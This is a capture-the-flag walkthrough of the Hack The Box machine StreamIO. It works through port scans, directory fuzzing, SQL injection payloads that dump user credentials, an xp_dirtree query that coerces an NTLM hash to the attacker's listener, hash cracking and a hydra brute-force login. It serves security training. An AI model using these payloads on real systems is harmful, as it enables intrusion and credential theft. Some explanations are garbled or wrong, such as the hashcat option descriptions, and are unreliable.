▶️StreamIO

https://app.hackthebox.com/machines/474

Starting to get high level

First we start by going through all the ports open without being to verbose:

nmap -p- --min-rate 10000 10.129.77.104

then we do a verbose scan for the open ports:

nmap -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.77.104

Based on the IIS Version on 80, the host is likely running Windows 10+ or Server 2016+.

The combination of services (DNS 53, Kerberos 88, LDAP 389 and others, SMB 445, RPC 135, Netbios 139, and others) suggests this is a domain controller.

On port 443 we can see 2 DNS to put in our /etc/hosts: streamIO.htb and watch.streamIO.htb

After a fuzz on 80 and 443, we only found the watch. DNS, we can go and enumerate SMB (445) now

Offensive Security Cheatsheet

crackmapexec smb 10.129.77.104

So now we can add DC.streamIO.htb to the hosts folder

anonymous login did not work on the SMB shares, so let's start looking at the websites:

port 80 is just a IIS page, on the other hand the streamIO.htb on port 443 (HTTPS) is interesting:

on the about page:

Maybe some possible users?

we see some subdomains that end with php, maybe it's the way to go for feroxbuster?

feroxbuster -u streamIO.htb -x php -w /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k

we get some pretty interesting domains

that's quite interesting

so let's go on our login page that has a little register button under it:

Let's register -> Felix/Felix

even after register, I can't connect?

let's pivot to their other plateform watch.

Note that every domain in HTTP redirects to IIS and HTTPS to the interesting domain ⁉️

i subscribed with a test@test.com and got this response:

Let's try to see some subdomains for this one:

feroxbuster -u https://watch.streamio.htb -x php -w

the only subdomain that seemed interesting was the blocked.php:

Aye, we have got to be extra precocious

after a second look, the search.php was interesting:

all the watch buttons are popping this up:

Let's see if we can get some stuff out of this:

so it's clearly using wildcards or some sort like *the*

So the query could look something like:

select * from movies where title like '%the%';

so if in the input i do something like the';-- -

yeah just as i thought it returns every movie that ENDS with the because now the query looke like %the

playing with the input, we can easily find the query to print all:

now let's use the column tricks I learned in the sql documentation:

😛pageSQL Injection

damn first try 😂

snatch' union select null#

Ok so after waiting for 1h i was not really blocked, after looking for a session id or whatever could block me i was just redirected to the blocked.php page so the input is probably case sensitive ->

this does not redirect me:

snatch' union 1;-- -

after troubleshooting, some typo does not return anything that is very wierd:

abcd' union select 1,2,3,4,5,6;-- -

abcd' union select 1,2,3,4,5,6;-- - is used to inject a new query into a legitimate SQL query and extract data from the database. The union keyword is used to join the results of the original query and the injected query, and the select statement is used to specify the values to be returned. The ; character is used to terminate the query, and the -- and - characters are used to start and complete a comment.

---

I’ll try to get the DB version. This cheat sheet shows how with different database types. It’s fair to guess that this is either MSSQL (since it’s Windows) or MySQL (very common with PHP). Both of those use @@version, and it works:

lets try stacked queries to get a Net-NTLMv2 hash

Getting Creds via NTLMv20xdf hacks stuff

after setting up responder ->

responder -I tun0 -wrf

and input:

abcd'; use master; exec xp_dirtree '\\10.10.14.166\share';-- -

we get some form of response:

Unfortunately hash cat won't crack because it's a machine account so unlikely to be crackable ->

abcd'union select 1,name,3,4,5,6 from master..sysdatabases;-- -

• union select 1,name,3,4,5,6 is the second query that is being injected. The select keyword is used to specify the columns to be returned. In this case, selecting the values 1, name, 3, 4, 5, and 6. The name column is being selected from the master..sysdatabases table.

• from master..sysdatabases specifies the table from which the data is being selected. The master database contains system information about instance, and the ases table contains information about all on the.

sys.databases (Transact-SQL) - SQL ServerMicrosoftLearn

The purpose of this query is to extract the names of all databases on the server. The union keyword is used to combine the results of the original query with the results injected query. By selecting the name column from the sysdatabases table, the attacker can extract databases on the server. The values 1, 3, 4, 5, and 6 are used to ensure that the number of columns in the two queries match, which is required for the union keyword to work properly.

System Databases - SQL ServerMicrosoftLearn

we can see in this doc that all the DB's are system DB's, our DB is STREAMIO

so to continue our sqli i look at the syntax on the website:

sys.objects (Transact-SQL) - SQL ServerMicrosoftLearn

abcd'union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';-- -

we continue our way in:

abcd' union select 1,name,id,4,5,6 from streamio..syscolumns where id in (885578193,901578250);-- -

we got the interesting tables, so now we'll try getting both at once:

abcd'union select 1,username,3,4,5,6 from users;-- -

We could try to do the same for the password and go from there but let's directly concat the 2 in one query:

abcd'union select 1,concat(username,':',password),3,4,5,6 from users;-- -

So you put the passwords in a txt file and start cracking them with haschat

hashcat hashesStreamio.txt /usr/share/wordlists/rockyou.txt --user -m 0 --show

• --user is an option that specifies that the attack mode is set to "user-mode", which is used for cracking hashes of user passwords.

• -m 0 is an option that specifies the hash type to be cracked. In this case, the hash type is set to 0, which is the default hash type for hashcat.

• --show is an option that specifies that the cracked passwords should be displayed.

you can do it with all of them at one:

admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd
Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$
Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara
dfdfdf:ae27a4b4821b13cad2a17a75d219853e:dfdfdf
Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch
[...]

Now if you want to do a high scale separation:

cat hashesStreamio | cut -d: -f1 > user
cat hashesStreamio | cut -d: -f3 > pass

then to test out all the hashes:

crackmapexec smb 10.129.238.190 -u USER -p PASS --no-bruteforce --continue-on-success

Unfortunately Everything fails

But we still got valid creds so it's not too hard to guess where we need to go after that:

We could try all manual, but let's automatize:

Let's format it for a bruteforce:

cat HASHESV2 | cut -d: -f1,3 > userpass

hydra -C userpass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"

Which will output:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-12 21:54:58
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries, ~1 try per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=failed
[443][http-post-form] host: streamio.htb   login: yoshihide   password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-12 21:55:00

We are able to connect and after further enumeration, access the admin page:

I am able to delete some stuff from the database: